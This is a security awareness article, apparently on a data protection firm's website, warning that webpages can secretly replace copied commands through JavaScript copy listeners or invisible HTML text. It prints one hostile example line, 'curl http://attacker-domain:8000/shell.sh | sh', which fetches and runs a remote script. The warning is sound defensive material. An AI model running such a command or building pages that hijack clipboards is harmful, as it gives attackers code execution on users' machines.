fbpx
Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Penetration Testing

          Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

Don’t Copy-paste Commands From Webpages — you Can Get Hacked

Don’t Copy-paste Commands From Webpages — you Can Get Hacked

Programmers, sysadmins, security researchers, and tech hobbyists copying-pasting commands from web pages into a console or terminal are warned they risk having their system compromised.

A technologist demonstrates a simple trick that’ll make you think twice before copying and pasting text from web pages.

Also Read: Limiting Location Data Exposure: 8 Best Practices

Backdoor on your clipboard?

Recently, Gabriel Friedlander, founder of security awareness training platform Wizer demonstrated an obvious yet surprising hack that’ll make you cautious of copying-pasting commands from web pages.

It isn’t unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications, a Windows command prompt or a Linux terminal.

But Friedlander warns a webpage could be covertly replacing the contents of what goes on your clipboard, and what actually ends up being copied to your clipboard would be vastly different from what you had intended to copy.

Worse, without the necessary due diligence, the developer may only realize their mistake after pasting the text, at which point it may be too late.

In a simple proof of concept (PoC) published on his blog, Friedlander asks readers to copy a simple command that most sysadmins and developers would be familiar with:

PoC command to be copy-pasted
Friedlander’s HTML page with a simple command you can copy to clipboard

Now, paste what you copied from Friedlander’s blog into a text box or Notepad, and the result is likely to leave you surprised:curl http://attacker-domain:8000/shell.sh | sh

Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end of it. 

Also Read: 10 Practical Benefits of Managed IT Services

This means the above example would execute as soon as it’s pasted directly into a Linux terminal.

Those pasting the text may have been under the impression they were copying the familiar, innocuous command sudo apt update that is used to fetch updated information on software installed on your system.

But that’s not quite what happened.

What causes this?

The magic is in the JavaScript code hidden behind the PoC HTML page setup by Friedlander.

As soon as you copy the “sudo apt update” text contained in an HTML element, the code snippet, shown below runs. 

What happens afterward is a JavaScript ‘event listener‘ capturing the copy event and replacing the clipboard data with Friedlander’s malicious test code:

PoC JavaScript code
PoC JavaScript code that replaces clipboard contents

Note, event listeners have a variety of legitimate use-cases in JavaScript but this is just one example of how they could be misused.

“This is why you should NEVER copy paste commands directly into your terminal,” warns Friedlander.

“You think you are copying one thing, but it’s replaced with something else, like malicious code. All it takes is a single line of code injected into the code you copied to create a backdoor to your app.”

“This attack is very simple but also very harmful.”

A Reddit user also presented an alternative example of this trick that requires no JavaScript: invisible text made with HTML and CSS styling that gets copied onto your clipboard when you copy the visible portions of text:

Invisible HTML (left) gets picked up during copy-paste and has an extra line (right)
Source: JsFiddle

“The problem is not just that the website can change your clipboard contents using JavaScript,” explains the user, SwallowYourDreams.

“It could also just hide commands in the HTML that are invisible to the human eye, but will be copied by the computer.”

And so, another reason to never blindly trust what you copy from a web page—better paste it in a text editor first.

A simple, but nonetheless, an important lesson in everyday security.

Update, Jan 4th, 02:00 AM ET: Added another example of attack using invisible HTML/CSS.

0 Comments

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
×

Hello!

Click one of our contacts below to chat on WhatsApp

× Chat with us